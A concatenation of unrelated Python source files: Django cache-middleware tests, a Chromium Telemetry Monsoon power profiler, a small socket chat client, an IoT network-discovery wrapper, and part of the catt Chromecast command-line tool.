self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(TestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the Etag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(TestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(TestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
monsoon_profiler.py
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import csv
import multiprocessing
import os
import sys
from telemetry.core import exceptions
from telemetry.core import util
from telemetry.core.platform import profiler
sys.path.append(os.path.join(util.GetTelemetryDir(), 'third_party', 'internal'))
try:
import monsoon # pylint: disable=F0401
except ImportError:
monsoon = None
def _CollectData(output_path, is_collecting):
mon = monsoon.Monsoon(wait=False)
mon.SetMaxCurrent(2.0)
# Note: Telemetry requires the device to be connected by USB, but that
# puts it in charging mode. This increases the power consumption.
mon.SetUsbPassthrough(1)
# Nominal Li-ion voltage is 3.7V, but it puts out 4.2V at max capacity. Use
# 4.0V to simulate a "~80%" charged battery. Google "li-ion voltage curve".
# This is true only for a single cell. (Most smartphones, some tablets.)
mon.SetVoltage(4.0)
samples = []
try:
mon.StartDataCollection()
# Do one CollectData() to make the Monsoon set up, which takes about
# 0.3 seconds, and only signal that we've started after that.
mon.CollectData()
is_collecting.set()
while is_collecting.is_set():
samples += mon.CollectData()
finally:
mon.StopDataCollection()
# Add x-axis labels.
plot_data = [(i / 5000., sample) for i, sample in enumerate(samples)]
# Print data in csv.
with open(output_path, 'w') as output_file:
output_writer = csv.writer(output_file)
output_writer.writerows(plot_data)
output_file.flush()
print 'To view the Monsoon profile, run:'
print (' echo "set datafile separator \',\'; plot \'%s\' with lines" | '
'gnuplot --persist' % output_path)
class MonsoonProfiler(profiler.Profiler):
"""Profiler that tracks current using Monsoon Power Monitor.
http://www.msoon.com/LabEquipment/PowerMonitor/
The Monsoon device measures current in amps at 5000 samples/second.
"""
def __init__(self, browser_backend, platform_backend, output_path, state):
super(MonsoonProfiler, self).__init__(
browser_backend, platform_backend, output_path, state)
# We collect the data in a separate process, so we can continuously
# read the samples from the USB port while running the test.
self._is_collecting = multiprocessing.Event()
self._collector = multiprocessing.Process(
target=_CollectData, args=(output_path, self._is_collecting))
self._collector.start()
if not self._is_collecting.wait(timeout=0.5):
self._collector.terminate()
raise exceptions.ProfilingException('Failed to start data collection.')
@classmethod
def name(cls):
return 'monsoon'
@classmethod
def is_supported(cls, browser_type):
if not monsoon:
return False
try:
monsoon.Monsoon(wait=False)
except IOError:
return False
else:
return True
def CollectProfile(self):
self._is_collecting.clear()
self._collector.join()
return [self._output_path]
|
client.py
|
import socket
import sys
import threading
PORT = 8999
HEADER = 128
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = '!DISCONNECT'
SERVER = '192.168.0.27'
ADDR = (SERVER, PORT)
def input_thread():
while True:
msg = input()
if not len(msg) > 0:
continue
send(msg)
if msg == DISCONNECT_MESSAGE:
sys.exit()
def send(msg: str):
message = msg.encode(FORMAT)
msg_length = len(message)
send_length = str(msg_length).encode(FORMAT)
send_length += b' ' * (HEADER - len(send_length))
client.send(send_length)
client.send(message)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
thread = threading.Thread(target=input_thread)
thread.start()
try:
client.connect(ADDR)
except ConnectionRefusedError:
print('[ERROR] Server not online...')
sys.exit()
while True:
msg_length = client.recv(HEADER).decode(FORMAT)
if msg_length:
try:
msg_length = int(msg_length)
except:
...
else:
msg = client.recv(msg_length).decode(FORMAT)
print(f'[MSG] {msg}')
|
netdisco_wrapper.py
|
"""
Periodically start netdisco and extract naming info about the network.
"""
import json
import requests
import stat
import subprocess
from netdisco.discovery import NetworkDiscovery
import os
import threading
import time
import utils
BASE_BINARY_PATH = 'https://github.com/noise-lab/netdisco-python-wrapper/raw/master/release/device_identifier_{os}' # noqa
DOWNLOAD_CHUNK_SIZE = 1024 * 1024
class NetdiscoWrapper(object):
def __init__(self, host_state):
self._host_state = host_state
self._os = utils.get_os()
self._netdisco_path = self._get_netdisco_path()
def start(self):
th = threading.Thread(target=self._start_thread)
th.daemon = True
th.start()
def _start_thread(self):
while True:
time.sleep(3)
if len(self._host_state.get_ip_mac_dict_copy()) > 0:
utils.safe_run(self._run_netdisco)
def _get_netdisco_path(self):
exe_name = 'iot-inspector-netdisco'
return os.path.join(
os.path.expanduser('~'),
'princeton-iot-inspector',
exe_name)
def _run_netdisco(self):
netdis = NetworkDiscovery()
netdis.scan()
for device_type in netdis.discover():
device_info = netdis.get_info(device_type)[0]
device_ip = device_info['host']
device_info['device_type'] = device_type
# Find MAC based on IP
try:
with self._host_state.lock:
device_mac = self._host_state.ip_mac_dict[device_ip]
except KeyError:
continue
# Get device_id based on MAC
device_id = utils.get_device_id(device_mac, self._host_state)
# Submit for upload lter
with self._host_state.lock:
self._host_state.pending_netdisco_dict \
.setdefault(device_id, []).append(device_info)
def test():
n = NetdiscoWrapper(None)
n._download_netdisco_binary()
if __name__ == '__main__':
test()
|
cli.py
|
# -*- coding: utf-8 -*-
import configparser
import random
import sys
import time
from pathlib import Path
from threading import Thread
from urllib.parse import urlparse
import click
from . import __version__
from .controllers import Cache
from .controllers import CastState
from .controllers import get_chromecasts
from .controllers import setup_cast
from .controllers import StateFileError
from .controllers import StateMode
from .error import CastError
from .error import CattUserError
from .error import CliError
from .http_server import serve_file
from .subs_info import SubsInfo
from .util import echo_json
from .util import echo_status
from .util import echo_warning
from .util import hunt_subtitles
from .util import is_ipaddress
CONFIG_DIR = Path(click.get_app_dir("catt"))
CONFIG_PATH = Path(CONFIG_DIR, "catt.cfg")
STATE_PATH = Path(CONFIG_DIR, "state.json")
class CattTimeParamType(click.ParamType):
def convert(self, value, param, ctx):
try:
tdesc = [int(x) for x in value.split(":")]
tlen = len(tdesc)
if (tlen > 1 and any(t > 59 for t in tdesc)) or tlen > 3:
raise ValueError
except ValueError:
self.fail("{} is not a valid time description.".format(value))
tdesc.reverse()
return sum(tdesc[p] * 60 ** p for p in range(tlen))
CATT_TIME = CattTimeParamType()
class YtdlOptParamType(click.ParamType):
def convert(self, value, param, ctx):
if "=" not in value:
self.fail("{} is not a valid key/value pair.".format(value))
ykey, yval = value.split("=", 1)
yval = {"true": True, "false": False}.get(yval.lower().strip(), yval)
return (ykey, yval)
YTDL_OPT = YtdlOptParamType()
def process_url(ctx, param, value):
if value == "-":
stdin_text = click.get_text_stream("stdin")
if not stdin_text.isatty():
value = stdin_text.read().strip()
else:
raise CliError("No input received from stdin")
if "://" not in value:
if ctx.info_name != "cast":
raise CliError("Local file not allowed as argument to this command")
if not Path(value).is_file():
raise CliError("The chosen file does not exist")
return value
def process_path(ctx, param, value):
path = Path(value) if value else None
if path and (path.is_dir() or not path.parent.exists()):
raise CliError("The specified path is invalid")
return path
def process_subtitles(ctx, param, value):
if not value:
return None
pval = urlparse(value).path if "://" in value else value
if not pval.lower().endswith((".srt", ".vtt")):
raise CliError("Invalid subtitles format, only srt and vtt are supported")
if "://" not in value and not Path(value).is_file():
raise CliError("Subtitles file [{}] does not exist".format(value))
return value
def process_device(ctx, param, value):
"""
Resolve real device name when value is an alias.
:param value: Can be an ip-address or a name (alias or real name).
:type value: str
"""
if is_ipaddress(value):
return value
else:
return ctx.default_map["aliases"].get(value, value)
def fail_if_no_ip(ipaddr):
if not ipaddr:
raise CliError("Local IP-address could not be determined")
def create_server_thread(filename, address, port, content_type, single_req=False):
thr = Thread(target=serve_file, args=(filename, address, port, content_type, single_req))
thr.setDaemon(True)
thr.start()
return thr
CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"])
@click.group(context_settings=CONTEXT_SETTINGS)
@click.option("--delete-cache", is_flag=True, help="Empty the Chromecast discovery cache.")
@click.option("-d", "--device", metavar="NAME_OR_IP", callback=process_device, help="Select Chromecast device.")
@click.version_option(version=__version__, prog_name="catt", message="%(prog)s v%(version)s, Yearning Yachtman.")
@click.pass_context
def cli(ctx, delete_cache, device):
if delete_cache:
Cache().clear()
ctx.obj["device"] = device
@cli.command(short_help="Send a video to a Chromecast for playing.")
@click.argument("video_url", callback=process_url)
@click.option("-s", "--subtitles", callback=process_subtitles, metavar="SUB", help="Specify a subtitles file.")
@click.option(
"-f",
"--force-default",
is_flag=True,
help="Force use of the default Chromecast app (use if a custom app doesn't work).",
)
@click.option("-r", "--random-play", is_flag=True, help="Play random item from playlist, if applicable.")
@click.option(
"--no-subs", is_flag=True, default=False, help="Don't try to load subtitles automatically from the local folder."
)
@click.option("-n", "--no-playlist", is_flag=True, help="Play only video, if url contains both video and playlist ids.")
@click.option(
"-y",
"--ytdl-option",
type=YTDL_OPT,
multiple=True,
metavar="OPT",
help="YouTube-DL option. "
"Should be passed as `-y option=value`, and can be specified multiple times (implies --force-default).",
)
@click.option(
"-b",
"--block",
is_flag=True,
help="Keep catt process alive until playback has ended. "
"Only useful when casting remote files, as catt is already running a server when casting local files. "
"Currently exits after playback of single media, so not useful with playlists yet.",
)
@click.pass_obj
def cast(settings, video_url, subtitles, force_default, random_play, no_subs, no_playlist, ytdl_option, block=False):
controller = "default" if force_default or ytdl_option else None
playlist_playback = False
st_thr = su_thr = subs = None
cst, stream = setup_cast(
settings["device"], video_url=video_url, prep="app", controller=controller, ytdl_options=ytdl_option
)
media_is_image = stream.guessed_content_category == "image"
local_or_remote = "local" if stream.is_local_file else "remote"
if stream.is_local_file:
fail_if_no_ip(stream.local_ip)
st_thr = create_server_thread(
video_url, stream.local_ip, stream.port, stream.guessed_content_type, single_req=media_is_image
)
elif stream.is_playlist and not (no_playlist and stream.video_id):
if stream.playlist_length == 0:
cst.kill(idle_only=True)
raise CliError("Playlist is empty")
if not random_play and cst.playlist_capability and stream.playlist_all_ids:
playlist_playback = True
else:
if random_play:
entry = random.randrange(0, stream.playlist_length)
else:
echo_warning("Playlist playback not possible, playing first video")
entry = 0
stream.set_playlist_entry(entry)
if playlist_playback:
click.echo("Casting remote playlist {}...".format(video_url))
video_id = stream.video_id or stream.playlist_all_ids[0]
cst.play_playlist(stream.playlist_id, video_id=video_id)
else:
if not subtitles and not no_subs and stream.is_local_file:
subtitles = hunt_subtitles(video_url)
if subtitles:
fail_if_no_ip(stream.local_ip)
subs = SubsInfo(subtitles, stream.local_ip, stream.port + 1)
su_thr = create_server_thread(
subs.file, subs.local_ip, subs.port, "text/vtt;charset=utf-8", single_req=True
)
click.echo("Casting {} file {}...".format(local_or_remote, video_url))
click.echo(
'{} "{}" on "{}"...'.format("Showing" if media_is_image else "Playing", stream.video_title, cst.cc_name)
)
if cst.info_type == "url":
cst.play_media_url(
stream.video_url,
title=stream.video_title,
content_type=stream.guessed_content_type,
subtitles=subs.url if subs else None,
thumb=stream.video_thumbnail,
)
elif cst.info_type == "id":
cst.play_media_id(stream.video_id)
else:
raise ValueError("Invalid or undefined info type")
if stream.is_local_file or subs:
click.echo("Serving local file(s).")
if not media_is_image and (stream.is_local_file or block):
if not cst.wait_for(["PLAYING"], timeout=10):
raise CliError("Playback of {} file has failed".format(local_or_remote))
cst.wait_for(["UNKNOWN", "IDLE"])
elif (stream.is_local_file and media_is_image) or subs:
while (st_thr and st_thr.is_alive()) or (su_thr and su_thr.is_alive()):
time.sleep(1)
@cli.command("cast_site", short_help="Cast any website to a Chromecast.")
@click.argument("url", callback=process_url)
@click.pass_obj
def cast_site(settings, url):
cst = setup_cast(settings["device"], controller="dashcast", action="load_url", prep="app")
click.echo('Casting {} on "{}"...'.format(url, cst.cc_name))
cst.load_url(url)
@cli.command(short_help="Add a video to the queue (YouTube only).")
@click.argument("video_url", callback=process_url)
@click.option("-n", "--play-next", is_flag=True, help="Add video immediately after currently playing video.")
@click.pass_obj
def add(settings, video_url, play_next):
cst, stream = setup_cast(settings["device"], video_url=video_url, action="add", prep="control")
if cst.name != stream.extractor or not (stream.is_remote_file or stream.is_playlist_with_active_entry):
raise CliError("This url cannot be added to the queue")
click.echo('Adding video id "{}" to the queue.'.format(stream.video_id))
if play_next:
cst.add_next(stream.video_id)
else:
cst.add(stream.video_id)
@cli.command(short_help="Remove a video from the queue (YouTube only).")
@click.argument("video_url", callback=process_url)
@click.pass_obj
def remove(settings, video_url):
cst, stream = setup_cast(settings["device"], video_url=video_url, action="remove", prep="control")
if cst.name != stream.extractor or not stream.is_remote_file:
raise CliError("This url cannot be removed from the queue")
click.echo('Removing video id "{}" from the queue.'.format(stream.video_id))
cst.remove(stream.video_id)
@cli.command(short_help="Clear the queue (YouTube only).")
@click.pass_obj
def clear(settings):
cst = setup_cast(settings["device"], action="clear", prep="control")
cst.clear()
@cli.command(short_help="Pause a video.")
@click.pass_obj
def pause(settings):
cst = setup_cast(settings["device"], action="pause", prep="control")
cst.pause()
@cli.command(short_help="Resume a video after it has been paused.")
@click.pass_obj
def play(settings):
cst = setup_cast(settings["device"], action="play", prep="control")
cst.play()
@cli.command("play_toggle", short_help="Toggle between playing and paused state.")
@click.pass_obj
def play_toggle(settings):
cst = setup_cast(settings["device"], action="play_toggle", prep="control")
cst.play_toggle()
@cli.command(short_help="Stop playing.")
@click.option(
"-f",
"--force",
is_flag=True,
help="Launch dummy chromecast app before sending stop command "
"(for devices that do not respond to stop command under certain circumstances).",
)
@click.pass_obj
def stop(settings, force):
cst = setup_cast(settings["device"])
cst.kill(force=force)
@cli.command(short_help="Rewind a video by TIME duration.")
@click.argument("timedesc", type=CATT_TIME, required=False, default="30", metavar="TIME")
@click.pass_obj
def rewind(settings, timedesc):
cst = setup_cast(settings["device"], action="rewind", prep="control")
cst.rewind(timedesc)
@cli.command(short_help="Fastforward a video by TIME duration.")
@click.argument("timedesc", type=CATT_TIME, required=False, default="30", metavar="TIME")
@click.pass_obj
def ffwd(settings, timedesc):
